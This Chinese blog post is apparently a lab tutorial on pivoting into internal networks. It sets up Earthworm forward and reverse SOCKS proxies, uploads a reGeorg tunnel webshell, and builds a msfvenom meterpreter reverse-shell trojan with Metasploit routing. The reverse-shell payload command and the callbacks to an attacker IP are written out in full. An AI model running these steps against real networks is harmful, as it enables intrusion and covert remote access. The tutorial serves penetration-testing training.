欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页

内网转发——反弹代理

程序员文章站 2022-05-15 20:18:39
...

内网渗透不光只是反弹一个shell,反弹一个端口,我们更需要对内网进行更深一步的扫描和渗透,这时候就需要设置找到一个代理服务器,充当外网和内网数据转发的节点。所以出现了反弹代理,也叫反弹socket

实验一:利用Earthworm实现内网代理转发

实验1:正向代理

实验环境 :win2008  网卡一:10.1.1.1 

                                  网卡二:192.168.140.131

                   win2003:10.1.1.2

实验步骤:

1.将ew工具的ew_for_Win.exe程序上传到win2008服务器
2.进入ew工具的所在位置,设置代理:ew.exe -s ssocksd -l 800

  内网转发——反弹代理

3.访问受害者win2003的网页,即可访问到

  内网转发——反弹代理

4.外网想要访问受害者网页,也可通过bp添加代理,

内网转发——反弹代理内网转发——反弹代理

5.之后选择刚添加的代理,直接访问内网的ip即可访问到网页的内容

内网转发——反弹代理内网转发——反弹代理

内网转发——反弹代理

6.如果想要访问远程桌面,则可利用工具proxifier添加代理服务器,即可连接  内网转发——反弹代理 内网转发——反弹代理

    内网转发——反弹代理

7.如果在linux上设置代理,则可在浏览器设置代理,如下图,设置完成后即可访问目标主机的网页

    内网转发——反弹代理内网转发——反弹代理

8.kali中也可用proxychains工具,修改其配置文件,gedit /etc/proxychains.conf,在里边添加代理

    内网转发——反弹代理

9.之后输入:proxychains rdesktop 10.1.1.2就可通过代理进行远程连接

  内网转发——反弹代理

实验二:ew高级用法反向代理

实验环境 :主机A:物理机
                   主机B:win2008

实验步骤:

1.先在一台具有公网ip的主机A上运行以下命令:

ew.exe -s rcsocks -l 1080 -e 8888

  内网转发——反弹代理

2.在目标主机B上启动SOCKS v5 服务 并反弹到公网主机的8888端口

ew.exe -s rssocks -d 攻击者ip -e 8888

  内网转发——反弹代理

  内网转发——反弹代理

3.在主机A上添加代理服务器,127.0.0.1:1080,即可进行远程连接

  内网转发——反弹代理内网转发——反弹代理

  内网转发——反弹代理内网转发——反弹代理

实验三:ew工具进阶—正向反弹代理

实验环境:攻击机 A:物理机
                      win8B:网卡一:192.168.140.131
                                   网卡二:10.1.1.1
                      win3C: 网卡一:10.1.1.2
                                  网卡二:172.16.1.1
                      linuxD:172.16.1.2

实验步骤:

1.关闭受害者D的防火墙:service iptables stop

  内网转发——反弹代理

2.在内网边界机C上设置端口代理:ew.exe -s ssocksd -l 8000

  内网转发——反弹代理

3.在win8上做端口转发:

ew -s lcx_tran -l 1080 -f win3受害者ip -g 8000

  内网转发——反弹代理

4.利用proxifier添加代理服务器,ip为win8B的ip,1080端口

  内网转发——反弹代理

5.之后便可进行远程访问

内网转发——反弹代理

实验四:ew工具进阶—反向反弹代理

实验环境:攻击机A:物理机
                     win8B:网卡一:192.168.140.131
                                   网卡二:10.1.1.1
                     win3C: 网卡一:10.1.1.2
                                 网卡二:172.16.1.1
                     linuxD:172.16.1.2

实验步骤:

1.攻击机A开启监听端口:ew.exe  -s lcx_listen -l 1080 -e 8888

内网转发——反弹代理

2.内网边界机win3C将9999端口进行转发:ew.exe -s ssocksd -l 9999

内网转发——反弹代理

3.内网边界机win8B将内网边界机win3C与攻击机连接起来:

ew -s lcx_slave -d 攻击机ip -e 8888 -f 内网边界机win3C的ip -g 9999

内网转发——反弹代理

4.攻击机借助proxifier工具配置攻击机机器的代理:127.0.0.1:1080

内网转发——反弹代理

5.之后便可进行远程访问

内网转发——反弹代理

实验二:利用reGeorg工具进行反弹代理

实验环境:攻击机kali:192.168.140.137

               边界机win8:192.168.140.131

                                    10.1.1.1

               受害机win3:10.1.1.2

实验步骤:

1.kali机子装上有regeo软件

2.在win2008的wwwroot目录下上传tunnel.aspx文件

3.kali命令行输入:python reGeorgSocksProxy.py -u http://192.168.140.131/tunnel.aspx,可看到开启本地的8888端口

  内网转发——反弹代理

4.修改其配置文件:gedit /etc/proxychains.conf,将其代理改为本地的8888端口

  内网转发——反弹代理

5.利用代理连接受害者机子: proxychains rdesktop 10.1.1.2,便可进行远程访问

  内网转发——反弹代理

实验三:利用msf工具进行反弹代理

、实验环境:

实验步骤:

1.选择适合的payload,此处选择 user windows/x64/meterpreter_reverse_tcp

2.制作木马 

msfvenom -p windows/x64/meterpreter_reverse_tcp lhost=192.168.140.137 lport=4444 -f exe -o 1.exe


 内网转发——反弹代理

3.将木马上传到边界机win8上

4.进入管理工具:use exploit/multi/handler

5.设置paload:set payload windows/x64/meterpreter_reverse_tcp

内网转发——反弹代理

6.配置IP:set lhost 本机ip

内网转发——反弹代理

7.指行win8上的程序文件,并执行管理工具:exploit ,启动4444端口的监听

内网转发——反弹代理

8.跳到后台:background,可通过sessions 1返回

内网转发——反弹代理

9.添加路由:route 10.1.1.1 255.0.0.0 1,最后的1是代表走session 1

内网转发——反弹代理

10.查看路由:route print

  内网转发——反弹代理

11.利用路由生成代理端口,切换模块:use auxiliary/server/socks4a(该模块是用来做代理的模块)
    执行exploit -y   -y是指将其放到后台去执行

  内网转发——反弹代理

12.查看监听端口情况,发现1080已经开启

  内网转发——反弹代理

13.修改配置文件,注意改为socks4

内网转发——反弹代理

14.输入proxychains rdesktop 10.1.1.2进行远程连接

内网转发——反弹代理

相关标签: 后渗透